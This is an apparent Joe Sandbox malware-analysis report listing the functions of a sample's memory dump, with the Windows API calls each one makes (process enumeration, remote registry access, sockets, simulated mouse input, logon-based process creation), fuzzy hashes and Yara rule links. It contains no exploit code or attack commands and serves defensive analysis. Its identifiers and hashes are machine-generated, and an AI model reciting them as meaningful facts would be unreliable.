                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                            • String ID:
                                            • API String ID: 3761583154-0
                                            • Opcode ID: c7651a37515a967560f7e371d7719f57cba20f4541a5af01ee607f2748743447
                                            • Instruction ID: 191d1cf75e285f5c36ea1ff4da276c5e6303dd6f264ed5d9f244643666990d9f
                                            • Opcode Fuzzy Hash: c7651a37515a967560f7e371d7719f57cba20f4541a5af01ee607f2748743447
                                            • Instruction Fuzzy Hash: 26213175604218AFDB10EBBCDD89DAB77ACFF483607448125FA09CB2A5E674EC418B64
                                            Function 0086A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0081D1BA
                                              • Part of subcall function 0081D17C: GetStockObject.GDI32(00000011), ref: 0081D1CE
                                              • Part of subcall function 0081D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0081D1D8
                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0086A32D
                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0086A33A
                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0086A345
                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0086A354
                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0086A360
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$CreateObjectStockWindow
                                            • String ID: Msctls_Progress32
                                            • API String ID: 1025951953-3636473452
                                            • Opcode ID: ca1b51ba569a94b0c3e1b48a1d97e9183406ff44522eee7b076681673475d511
                                            • Instruction ID: 4f6ec63757cf59a9ea30738f420e4c73683e18ab76f58510f4b56109b4f471c5
                                            • Opcode Fuzzy Hash: ca1b51ba569a94b0c3e1b48a1d97e9183406ff44522eee7b076681673475d511
                                            • Instruction Fuzzy Hash: 511190B115021DBEEF159FA4CC86EEB7F6DFF09798F014114BA08A61A0C6729C21DBA4
                                            Function 0081CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetClientRect.USER32(?,?), ref: 0081CCF6
                                            • GetWindowRect.USER32(?,?), ref: 0081CD37
                                            • ScreenToClient.USER32(?,?), ref: 0081CD5F
                                            • GetClientRect.USER32(?,?), ref: 0081CE8C
                                            • GetWindowRect.USER32(?,?), ref: 0081CEA5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Rect$Client$Window$Screen
                                            • String ID:
                                            • API String ID: 1296646539-0
                                            • Opcode ID: ac623480021ac9d4fb3d02a1c6ec3accce21760d920c0e519c4576f7ffb8dc8a
                                            • Instruction ID: 708010ed9fd4c472fce8eb1e37835c2a2f2df13925e2b04591bf23f2c65f39b2
                                            • Opcode Fuzzy Hash: ac623480021ac9d4fb3d02a1c6ec3accce21760d920c0e519c4576f7ffb8dc8a
                                            • Instruction Fuzzy Hash: AFB16B7990064ADBDF10CFA8C4807EEBBB5FF08314F149569EC59EB254EB30A990CB64
                                            Function 00861BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00861C18
                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00861C26
                                            • __wsplitpath.LIBCMT ref: 00861C54
                                              • Part of subcall function 00821DFC: __wsplitpath_helper.LIBCMT ref: 00821E3C
                                            • _wcscat.LIBCMT ref: 00861C69
                                            • Process32NextW.KERNEL32(00000000,?), ref: 00861CDF
                                            • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00861CF1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                            • String ID:
                                            • API String ID: 1380811348-0
                                            • Opcode ID: 5c52f61c0233ae4c9065d87f78a673bf34c3c7ac4ddf50451740214f3ba3260c
                                            • Instruction ID: 3e4097780a13b46f5053b24a73c6386e7e7a923a3d79f61b071e6c61a24f817e
                                            • Opcode Fuzzy Hash: 5c52f61c0233ae4c9065d87f78a673bf34c3c7ac4ddf50451740214f3ba3260c
                                            • Instruction Fuzzy Hash: 93514BB15043009BD720EF68D896EABB7ECFF88754F04491EF585D7292EB709944CB92
                                            Function 00862FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00863C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00862BB5,?,?), ref: 00863C1D
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008630AF
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008630EF
                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00863112
                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0086313B
                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0086317E
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0086318B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                            • String ID:
                                            • API String ID: 3451389628-0
                                            • Opcode ID: 730d624bc179950c33cc9d677da411c26018e172f21f120fa3e723718f964c8b
                                            • Instruction ID: f54059c63dce1c5964080b32bbbca88fec2ae8ce627c3a6aa3f20732a07612c3
                                            • Opcode Fuzzy Hash: 730d624bc179950c33cc9d677da411c26018e172f21f120fa3e723718f964c8b
                                            • Instruction Fuzzy Hash: C3514571108304AFC704EF68CC96E6ABBE9FF89314F04491DF5959B2A1DB71EA09CB52
                                            Function 008684DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetMenu.USER32(?), ref: 00868540
                                            • GetMenuItemCount.USER32(00000000), ref: 00868577
                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0086859F
                                            • GetMenuItemID.USER32(?,?), ref: 0086860E
                                            • GetSubMenu.USER32(?,?), ref: 0086861C
                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0086866D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Menu$Item$CountMessagePostString
                                            • String ID:
                                            • API String ID: 650687236-0
                                            • Opcode ID: 9c95e0673667967e6f684d428d7e397cb726eb59a2d82b420e7c345d1d8201c1
                                            • Instruction ID: 2e8175c6a27b90238a08e63214307ce0ef978bad3c99cf09a3c635511b10cd93
                                            • Opcode Fuzzy Hash: 9c95e0673667967e6f684d428d7e397cb726eb59a2d82b420e7c345d1d8201c1
                                            • Instruction Fuzzy Hash: B1518D71A00219EFCB11EF68C849AAEB7F5FF58310F114559E90AFB391DB70AE418B91
                                            Function 00844AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00844B10
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00844B5B
                                            • IsMenu.USER32(00000000), ref: 00844B7B
                                            • CreatePopupMenu.USER32 ref: 00844BAF
                                            • GetMenuItemCount.USER32(000000FF), ref: 00844C0D
                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00844C3E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                            • String ID:
                                            • API String ID: 3311875123-0
                                            • Opcode ID: dffd6f649400c0e5f46e3a7b400cf3b1276ed5f87870a4382137c9c8e3a4ba2a
                                            • Instruction ID: 432b3e61e44c12a1641b29395733ec48b40e84225cf3a5a38c29640408584f59
                                            • Opcode Fuzzy Hash: dffd6f649400c0e5f46e3a7b400cf3b1276ed5f87870a4382137c9c8e3a4ba2a
                                            • Instruction Fuzzy Hash: DC51CD7060131DEBDF20CFA8D888BADBBF4FF54328F18515AE455DA291E3709944CB51
                                            Function 00858DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0089DC00), ref: 00858E7C
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00858E89
                                            • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00858EAD
                                            • #16.WSOCK32(?,?,00000000,00000000), ref: 00858EC5
                                            • _strlen.LIBCMT ref: 00858EF7
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00858F6A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorLast$_strlenselect
                                            • String ID:
                                            • API String ID: 2217125717-0
                                            • Opcode ID: d05e203fd2376088841e2e0e79ded6a36123c7698d92c91464a6afa186be9f17
                                            • Instruction ID: d2a2be2f49d6a13768b717153ac95c8fe3dc22a4caa59d7544b8bb9fcb3357ec
                                            • Opcode Fuzzy Hash: d05e203fd2376088841e2e0e79ded6a36123c7698d92c91464a6afa186be9f17
                                            • Instruction Fuzzy Hash: 9141B271500208ABCB04EBA8CD96EAEB7B9FF48315F10425AF916E72D1DF30AE44CB51
                                            Function 0081ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • BeginPaint.USER32(?,?,?), ref: 0081AC2A
                                            • GetWindowRect.USER32(?,?), ref: 0081AC8E
                                            • ScreenToClient.USER32(?,?), ref: 0081ACAB
                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0081ACBC
                                            • EndPaint.USER32(?,?,?,?,?), ref: 0081AD06
                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0087E673
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                            • String ID:
                                            • API String ID: 2592858361-0
                                            • Opcode ID: 82e9fb4781c9c7dd6cc26a2db8a11b17e51cfd9d699ef5f2b55923f17a04ff81
                                            • Instruction ID: 26a04fe7d9ceecc053aa4f3014b12f3fe1bf3715f71184b7cae0780f76178308
                                            • Opcode Fuzzy Hash: 82e9fb4781c9c7dd6cc26a2db8a11b17e51cfd9d699ef5f2b55923f17a04ff81
                                            • Instruction Fuzzy Hash: 0741A3701053059FCB10DF28DC88FB67BB8FF6A724F040659F994C62A2D7319885DBA2
                                            Function 0086E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ShowWindow.USER32(008C1628,00000000,008C1628,00000000,00000000,008C1628,?,0087DC5D,00000000,?,00000000,00000000,00000000,?,0087DAD1,00000004), ref: 0086E40B
                                            • EnableWindow.USER32(00000000,00000000), ref: 0086E42F
                                            • ShowWindow.USER32(008C1628,00000000), ref: 0086E48F
                                            • ShowWindow.USER32(00000000,00000004), ref: 0086E4A1
                                            • EnableWindow.USER32(00000000,00000001), ref: 0086E4C5
                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0086E4E8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$Show$Enable$MessageSend
                                            • String ID:
                                            • API String ID: 642888154-0
                                            • Opcode ID: 1d43d925838830e24b09f9932251b36b6fec5de2726149bed62198b32cd8de5f
                                            • Instruction ID: 01e848209cf04bfe490b378bb0001e4b161d845bf862df7a40f8ebb2e68dbbb2
                                            • Opcode Fuzzy Hash: 1d43d925838830e24b09f9932251b36b6fec5de2726149bed62198b32cd8de5f
                                            • Instruction Fuzzy Hash: 5D416238601945EFDB26CF38C499B947BE1FF09704F1941A9EA58CF2A2CB31E841CB95
                                            Function 008498BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 008498D1
                                              • Part of subcall function 0081F4EA: std::exception::exception.LIBCMT ref: 0081F51E
                                              • Part of subcall function 0081F4EA: __CxxThrowException@8.LIBCMT ref: 0081F533
                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00849908
                                            • EnterCriticalSection.KERNEL32(?), ref: 00849924
                                            • LeaveCriticalSection.KERNEL32(?), ref: 0084999E
                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008499B3
                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 008499D2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                            • String ID:
                                            • API String ID: 2537439066-0
                                            • Opcode ID: 99cc0516e407a6e298c1536132b7fdcbcc676a3ef42d1489a2c8df47b99de259
                                            • Instruction ID: fa58393a57985b93454261670f75e8d2b40eff6257705dbe22ee2f1f40475fe4
                                            • Opcode Fuzzy Hash: 99cc0516e407a6e298c1536132b7fdcbcc676a3ef42d1489a2c8df47b99de259
                                            • Instruction Fuzzy Hash: 63317031900205ABDB10EF98DC85EABBB78FF44310B1480A9E904EB296D734DA50DBA5
                                            Function 00859B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,008577F4,?,?,00000000,00000001), ref: 00859B53
                                              • Part of subcall function 00856544: GetWindowRect.USER32(?,?), ref: 00856557
                                            • GetDesktopWindow.USER32 ref: 00859B7D
                                            • GetWindowRect.USER32(00000000), ref: 00859B84
                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00859BB6
                                              • Part of subcall function 00847A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00847AD0
                                            • GetCursorPos.USER32(?), ref: 00859BE2
                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00859C44
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                            • String ID:
                                            • API String ID: 4137160315-0
                                            • Opcode ID: 510761ea187de52ca8c143bcf4675e17e128cc58b47edc98b8da3c686c15e536
                                            • Instruction ID: aa7390206408ba78d029746efa99505338afbb680a4d57b57787e9a9723345db
                                            • Opcode Fuzzy Hash: 510761ea187de52ca8c143bcf4675e17e128cc58b47edc98b8da3c686c15e536
                                            • Instruction Fuzzy Hash: D031C172104319ABD710DF18D849F9BB7EDFF88314F00091AF995D7181D631E908CB92
                                            Function 0083AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0083AFAE
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0083AFB5
                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0083AFC4
                                            • CloseHandle.KERNEL32(00000004), ref: 0083AFCF
                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0083AFFE
                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 0083B012
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                            • String ID:
                                            • API String ID: 1413079979-0
                                            • Opcode ID: cfa6e318ea05538757cfd14713a18eb86881cefbff5b15ae85ebf7d35d143acf
                                            • Instruction ID: 22c74cb8e5adf527868b8f66b96724ef83c97fbd0a002b839932d427ca94503a
                                            • Opcode Fuzzy Hash: cfa6e318ea05538757cfd14713a18eb86881cefbff5b15ae85ebf7d35d143acf
                                            • Instruction Fuzzy Hash: B6214CB214020DABDB069F98DD09FAE7BA9FF84308F144015FA41A21A1D7769D21EBA1
                                            Function 0086EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0081AFE3
                                              • Part of subcall function 0081AF83: SelectObject.GDI32(?,00000000), ref: 0081AFF2
                                              • Part of subcall function 0081AF83: BeginPath.GDI32(?), ref: 0081B009
                                              • Part of subcall function 0081AF83: SelectObject.GDI32(?,00000000), ref: 0081B033
                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0086EC20
                                            • LineTo.GDI32(00000000,00000003,?), ref: 0086EC34
                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0086EC42
                                            • LineTo.GDI32(00000000,00000000,?), ref: 0086EC52
                                            • EndPath.GDI32(00000000), ref: 0086EC62
                                            • StrokePath.GDI32(00000000), ref: 0086EC72
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                            • String ID:
                                            • API String ID: 43455801-0
                                            • Opcode ID: 2e88248fd39041fa7601923e6ec01fd8931ddcfeee74747c0aef8a39049d081a
                                            • Instruction ID: 608f79314233d911c348a21c8b4e837b5feb98f410613155caca32dd9747406b
                                            • Opcode Fuzzy Hash: 2e88248fd39041fa7601923e6ec01fd8931ddcfeee74747c0aef8a39049d081a
                                            • Instruction Fuzzy Hash: D7110576000249BFEF029F94DC88EEA7F6DFF08360F048122BA089A1A1D7719D55DBA0
                                            Function 0083E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDC.USER32(00000000), ref: 0083E1C0
                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0083E1D1
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0083E1D8
                                            • ReleaseDC.USER32(00000000,00000000), ref: 0083E1E0
                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0083E1F7
                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0083E209
                                              • Part of subcall function 00839AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00839A05,00000000,00000000,?,00839DDB), ref: 0083A53A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
